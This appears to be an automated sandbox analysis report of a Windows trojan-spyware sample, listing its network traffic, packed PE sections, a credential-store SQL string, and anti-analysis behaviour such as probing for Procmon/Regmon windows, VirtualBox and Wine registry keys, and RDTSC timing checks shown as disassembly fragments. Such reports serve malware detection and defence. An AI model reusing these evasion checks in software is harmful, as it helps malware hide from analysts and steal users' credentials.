Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49724 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49744 version: TLS 1.2

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: ZLIB complexity 0.9973442656765676
Source: file.exe | Static PE information: Section: mfsomwhk ZLIB complexity 0.9946697084481175
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0035F960 CoCreateInstance, | 0_2_0035F960
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000003.1373752466.00000000056E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056C9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1397120435.00000000056CA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: file.exe | Static file information: File size 1843200 > 1048576
Source: file.exe | Static PE information: Raw size of mfsomwhk is bigger than: 0x100000 < 0x198600

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.330000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mfsomwhk:EW;nugibpud:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mfsomwhk:EW;nugibpud:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cc166 should be: 0x1c2376
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: mfsomwhk
Source: file.exe | Static PE information: section name: nugibpud
Source: file.exe | Static PE information: section name: .taggant
Source: file.exe | Static PE information: section name: entropy: 7.970159978732974
Source: file.exe | Static PE information: section name: mfsomwhk entropy: 7.952928522417956

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B454 second address: 52B460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F45D50449A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B460 second address: 52B465 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B465 second address: 52B46B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B46B second address: 52B473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D86F second address: 52D878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C176 second address: 52C17B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C17B second address: 52C181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52DAC4 second address: 52DAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52DAC8 second address: 52DAD6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F45D50449A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52DAD6 second address: 52DADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52ED66 second address: 52ED6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52ED6B second address: 52ED71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532A70 second address: 532A7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F45D50449A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531E81 second address: 531E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D5047A2Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531E94 second address: 531E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531E98 second address: 531EB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A32h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531EB7 second address: 531ED7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F45D50449B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jng 00007F45D50449A6h 0x00000012 pop ecx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531ED7 second address: 531F02 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F45D5047A41h 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F45D5047A26h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5321C6 second address: 5321EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B4h 0x00000007 pushad 0x00000008 jmp 00007F45D50449AFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532356 second address: 532375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 jmp 00007F45D5047A36h 0x0000000d pop ebx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532375 second address: 532390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F45D50449B4h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5325FB second address: 532616 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532616 second address: 532620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F45D50449A6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532620 second address: 532664 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F45D5047A30h 0x00000010 jmp 00007F45D5047A36h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532664 second address: 532668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53633E second address: 536355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F45D5047A28h 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536355 second address: 53635A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53635A second address: 5363F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F45D5047A31h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 jp 00007F45D5047A2Ch 0x0000001b jmp 00007F45D5047A33h 0x00000020 popad 0x00000021 pop eax 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007F45D5047A28h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 0000001Bh 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c mov edi, 7C7DAD13h 0x00000041 mov esi, 673E8573h 0x00000046 call 00007F45D5047A29h 0x0000004b jno 00007F45D5047A32h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jc 00007F45D5047A2Ch 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5363F9 second address: 5363FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5363FD second address: 536435 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F45D5047A35h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F45D5047A35h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536435 second address: 536477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c jmp 00007F45D50449B0h 0x00000011 push eax 0x00000012 jmp 00007F45D50449B3h 0x00000017 pop eax 0x00000018 popad 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 pop edx 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5367B3 second address: 5367C5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F45D5047A28h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536F96 second address: 536FA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536FA8 second address: 536FAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537032 second address: 537060 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F45D50449AAh 0x0000000f mov dword ptr [ebp+1244BBE1h], ecx 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537060 second address: 537064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537064 second address: 537068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537068 second address: 53706E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53706E second address: 53708B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F45D50449AAh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jne 00007F45D50449A6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537110 second address: 537123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F45D5047A26h 0x0000000a popad 0x0000000b jo 00007F45D5047A2Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539572 second address: 5395BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D3843h], ebx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F45D50449A8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b mov di, dx 0x0000002e push 00000000h 0x00000030 mov edi, dword ptr [ebp+122D399Ah] 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b ja 00007F45D50449A6h 0x00000041 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538DB4 second address: 538DD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F45D5047A2Dh 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f jc 00007F45D5047A2Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5395BA second address: 5395C4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F45D50449A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5395C4 second address: 5395D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45D5047A2Dh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53AB9E second address: 53ABA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53ABA2 second address: 53ABB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53ABB0 second address: 53ABF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 nop 0x00000007 mov di, bx 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F45D50449A8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov edi, dword ptr [ebp+122D2C18h] 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D1C42h], edx 0x00000034 jmp 00007F45D50449ABh 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push eax 0x0000003e pop eax 0x0000003f pop eax 0x00000040 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C265 second address: 53C26B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C26B second address: 53C27A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C27A second address: 53C27E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C27E second address: 53C284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C284 second address: 53C28A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53CDCD second address: 53CDD7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F45D50449ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5428B8 second address: 5428BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F95D second address: 53F978 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547E17 second address: 547E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542A54 second address: 542A5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549E85 second address: 549E8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549E8A second address: 549EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c jmp 00007F45D50449B2h 0x00000011 pop ecx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543B63 second address: 543B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542A5A second address: 542A5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549EAC second address: 549EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 mov ebx, dword ptr [ebp+1245262Bh] 0x0000000f push 00000000h 0x00000011 or dword ptr [ebp+122D567Eh], ecx 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+122D5679h], esi 0x0000001f push eax 0x00000020 jbe 00007F45D5047A57h 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F45D5047A33h 0x0000002d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543B6E second address: 543BD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F45D50449A8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 movzx ebx, bx 0x0000002a sub ebx, dword ptr [ebp+122D2CD8h] 0x00000030 push dword ptr fs:[00000000h] 0x00000037 mov bh, dh 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 clc 0x00000041 mov eax, dword ptr [ebp+122D0BCDh] 0x00000047 sub dword ptr [ebp+12477143h], edi 0x0000004d push FFFFFFFFh 0x0000004f mov bh, C2h 0x00000051 push eax 0x00000052 pushad 0x00000053 pushad 0x00000054 pushad 0x00000055 popad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543BD3 second address: 543BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543BDC second address: 543BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
